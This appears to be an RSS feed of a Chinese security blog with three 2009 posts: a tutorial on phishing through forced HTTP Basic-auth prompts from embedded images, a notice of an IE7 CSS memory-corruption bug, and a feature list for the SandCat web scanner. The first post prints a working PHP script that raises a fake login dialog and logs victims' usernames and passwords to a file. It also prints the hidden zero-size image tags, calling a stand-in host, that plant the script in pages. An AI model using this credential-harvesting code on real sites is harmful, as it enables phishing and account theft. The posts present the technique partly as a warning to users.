暖月 » 安全审计 http://www.nuanyue.com 专注WEB、Linux及数据库应用安全 Sun, 01 Aug 2010 01:52:44 +0000 en hourly 1 http://wordpress.org/?v=3.0.1 图片引发验证的社工利用 http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html#comments Sun, 29 Nov 2009 06:52:53 +0000 http://www.nuanyue.com/?p=1029 文/ 在这充满诱惑的网络,恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面,往往更倾向于伪装用户服务提供商,或者是在用户交互时,直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站,让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年,国内也曾出现过假冒银行的网站,比如假冒中国工商银行的网站。而这一篇文章,将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。 在milw0rm.com网站,petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章,里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框(显示给用户好像是从目标网站)发起的一个授权认证对话框,而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下:

图片引发验证的社工利用

HTTP是一种基于请求与响应模式的、无状态的、应用层的协议,客户端向服务器发送一个请求,请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户 信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应,相应的内容包括消息协议的版本,成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:[......]

全文阅读

]]> 文/

在这充满诱惑的网络,恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面,往往更倾向于伪装用户服务提供商,或者是在用户交互时,直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站,让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年,国内也曾出现过假冒银行的网站,比如假冒中国工商银行的网站。而这一篇文章,将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。
在milw0rm.com网站,petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章,里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框(显示给用户好像是从目标网站)发起的一个授权认证对话框,而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下:

图片引发验证的社工利用

HTTP是一种基于请求与响应模式的、无状态的、应用层的协议,客户端向服务器发送一个请求,请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户 信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应,相应的内容包括消息协议的版本,成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:
HTTP请求:

GET /iai.php HTTP/1.1 表示请求方法GET,请求的地址,和HTTP协议版本
Accept: */*           表示客户端可识别的内容类型列表,*/*表示所有类型
Accept-Language: zh-cn 表示客户端所能解盘的语言:简体中文
Accept-Encoding: gzip, deflate 表示客户端可以解盘的类型
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)              表示客户端浏览器型号
Host: www.test.cn 表示提交请求的页面
Connection: Keep-Alive      表示TCP连接保持打开

HTTP响应:

HTTP/1.1 401 Unauthorized  表示HTTP协议版本,应答码是401 即未经授权访问
Date: Sat, 25 Jul 2009 11:42:27 GMT  表示当前的GMT时间
Server: Apache/2.2.3 (CentOS)  表示服务器的操作类型
X-Powered-By: PHP/5.1.6        表示服务器的脚本版本
WWW-Authenticate: Basic realm="Text" 表示客户端在Authenticate头中提供的授权信息
Content-Length: 3  表示连接内容长度
Connection: close  表示TCP连接关闭
Content-Type: text/html 表示文档类型
负责响应的iai.php文件内容:
  header('WWW-Authenticate: Basic realm="Text"');
  header('HTTP/1.0 401 Unauthorized');
使用了PHP中的Header()函数,发送一个原始HTTP标头[Http Header]到客户端。

钓鱼式攻击的利用,从上面流程图里,可以知道大致步骤如下:
在网页里插入恶意代码
插入调用远程图片的代码,形如:

[img]http://B.com/iai.php[/img]
<img src="http://B.com/iai.php" alt="" width="0" height="0" />

最好是高度宽度都为0,免得在网页里显示空白,代码如下:

&lt; !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
 
<img src="http://www.B.com/iai.php" alt="" />
 
<img src="http://www.B.com/iai.php" alt="" />

编写iai.php脚本这个脚本的主要功能包括返回401应答和获取提交的敏感信息,并保存。代码如下:

&lt; ?php
    global  $username,$passwd,$host;
      if (!isset($_SERVER['PHP_AUTH_USER']))
    {
     header('WWW-Authenticate: Basic realm="test"');
     header('HTTP/1.0 401 Unauthorized');
     exit;
     }
       $username=$_SERVER['PHP_AUTH_USER'];
       $passwd=$_SERVER['PHP_AUTH_PW'];
       $host = $_SERVER['HTTP_HOST'];
       $myFile = "log.txt";
       $fh = fopen($myFile, 'a') or die("can't open file");
       fwrite($fh, "网址:\t$host\t\t");
       fwrite($fh, "usname:\t$username\t");
       fwrite($fh, "passwd:\t$passwd\r\n");
       fclose($fh);
?&gt;

当正常用户访问网站时,插在网页里的iai.php文件,即会强制弹出验证框,如图:

图片引发验证的社工利用

如果用户提交了帐户或者密码后,iai.php会在后台自动提交给远程的log.txt文件,产生内容如下:

图片引发验证的社工利用

通过加载脚本强制验证窗体的弹出,此社工在利用时,还是具有一定的局限性。在隐藏攻击意图时,有些不足,弹出的框,比较生硬,也可以语言措辞下进行修改,但是对一些安全意识缺失的网民来说,还是会有上当的可能。希望大家能当心,不要轻易输入敏感信息。

]]> http://www.nuanyue.com/%e5%9b%be%e7%89%87%e5%bc%95%e5%8f%91%e9%aa%8c%e8%af%81%e7%9a%84%e7%a4%be%e5%b7%a5%e5%88%a9%e7%94%a8.html/feed 0 IE7.0 异常CSS导致内存破坏漏洞 http://www.nuanyue.com/ie7-0-%e5%bc%82%e5%b8%b8css%e5%af%bc%e8%87%b4%e5%86%85%e5%ad%98%e7%a0%b4%e5%9d%8f%e6%bc%8f%e6%b4%9e.html http://www.nuanyue.com/ie7-0-%e5%bc%82%e5%b8%b8css%e5%af%bc%e8%87%b4%e5%86%85%e5%ad%98%e7%a0%b4%e5%9d%8f%e6%bc%8f%e6%b4%9e.html#comments Wed, 25 Nov 2009 16:23:22 +0000 http://www.nuanyue.com/?p=1014 文/铱迅
1.漏洞介绍
在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码,[......]

全文阅读

]]> 文/铱迅
1.漏洞介绍
在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码,就可以执行任意命令。
2.漏洞危害(危害等级高)
黑客如果将含有“漏洞利用程序的网页”置于网站上,浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。
3.漏洞利用
1. 通过此漏洞执行Windows的calc命令示例(利用成功后将执行计算器程序)
点击查看:IE7.0 异常CSS导致内存破坏漏洞POC

]]> http://www.nuanyue.com/ie7-0-%e5%bc%82%e5%b8%b8css%e5%af%bc%e8%87%b4%e5%86%85%e5%ad%98%e7%a0%b4%e5%9d%8f%e6%bc%8f%e6%b4%9e.html/feed 0 SandCat :高级Web应用程序安全测试工具 http://www.nuanyue.com/sandcat-%ef%bc%9a%e9%ab%98%e7%ba%a7web%e5%ba%94%e7%94%a8%e7%a8%8b%e5%ba%8f%e5%ae%89%e5%85%a8%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7.html http://www.nuanyue.com/sandcat-%ef%bc%9a%e9%ab%98%e7%ba%a7web%e5%ba%94%e7%94%a8%e7%a8%8b%e5%ba%8f%e5%ae%89%e5%85%a8%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7.html#comments Fri, 05 Jun 2009 16:02:51 +0000 http://www.nuanyue.com/?p=568 SandCat 这是一个了不起的工具来工作。SandCat有两个版本-自由与专业版。SandCat所具有功能:
* 缓冲区溢出
* Cookie Manipulation *Cookie 修改
*命令执行
* CRLF注入
* Cross Frame Scripting *跨帧脚本
* 跨站点脚本[......]

全文阅读

]]> SandCat 这是一个了不起的工具来工作。SandCat有两个版本-自由与专业版。SandCat所具有功能:
* 缓冲区溢出
* Cookie Manipulation *Cookie 修改
*命令执行
* CRLF注入
* Cross Frame Scripting *跨帧脚本
* 跨站点脚本( XSS )
* Default Account *默认帐户
* 目录列表
* 目录遍历
* 文件包含
* 敏感信息泄露
* LDAP 注入
* MX 注入
* Password Disclosure 密码泄露
* Path Disclosure *路径泄露
* PHP代码注入
* 固有漏洞: IIS中/ iPlanet /其他
* Source Code Disclosure * 源代码公开
* SQL注入
* XPath Injection *XPath注入
* 杂项
它还执行下列应用程序会检查:
* Backup Files *备份文件
* Common Exposures: Dangerous Methods, Default Content, Internal IP Address Disclosure *共同暴露:危险方法,默认内容,内部IP地址信息披露
*常见的文件和文件夹
* Common Vulnerable Scripts: ASP, ASP .Net, PHP, JSP, Perl
* Email Form Hijacking *电子邮件劫持
* Outdated Server Software *过时的服务器软件
* Path Disclosure *路径泄露
* Source Code Disclosure * 源代码公开
* Suspicious HTML Comments *可疑的HTML评论
* Unencrypted Login *未加密的登录
* Web-Based Backdoors *基于Web的后门
* Compliance: OWASP Top 10, PHP Top 5 *遵守: OWASP十大, PHP的最常见的5个
* Fault Injection: Parameter Tampering, Form Field Manipulation *故障注入:参数篡改,表单域操纵

It can also perform these Server Checks:它也可以执行这些Server检查:
* CGI, CGI-Bin & CGI-Local Folders *共同闸道介面, cgi – bin目录和CGI方式,本地文件夹
* CGI-Sys *的CGI -系统
* Common Files and Folders *常见的文件和文件夹
* Common Server Vulnerabilities: Cisco IOS, ColdFusion, Domino, IIS, NCSA, FrontPage, FrontPage CGI *通用服务器漏洞:思科IOS , ColdFusion ,多米诺, IIS中,国家能力自评时, FrontPage , FrontPage中的CGI
* Common Vulnerable Scripts: ASP, ASP .Net, PHP, JSP, Perl *共同弱势脚本: ASP技术, ASP技术。净的, PHP , JSP的,的Perl
* Compliance: SANS Top Twenty *遵守: SANS的前20
* Database Disclosure * 数据库披露
* Denial-of-Service *拒绝服务
* IDS Testing *入侵检测系统测试
* Old/Backup Files: Common Backup Folders & Files *旧/备份文件:共同的备份文件夹和文件
* Outdated Server Software *过时的服务器软件
* Web-Based Backdoors *基于Web的后门
* WinCGI * WinCGI

下载:sandcat-3.7.8

]]> http://www.nuanyue.com/sandcat-%ef%bc%9a%e9%ab%98%e7%ba%a7web%e5%ba%94%e7%94%a8%e7%a8%8b%e5%ba%8f%e5%ae%89%e5%85%a8%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7.html/feed 0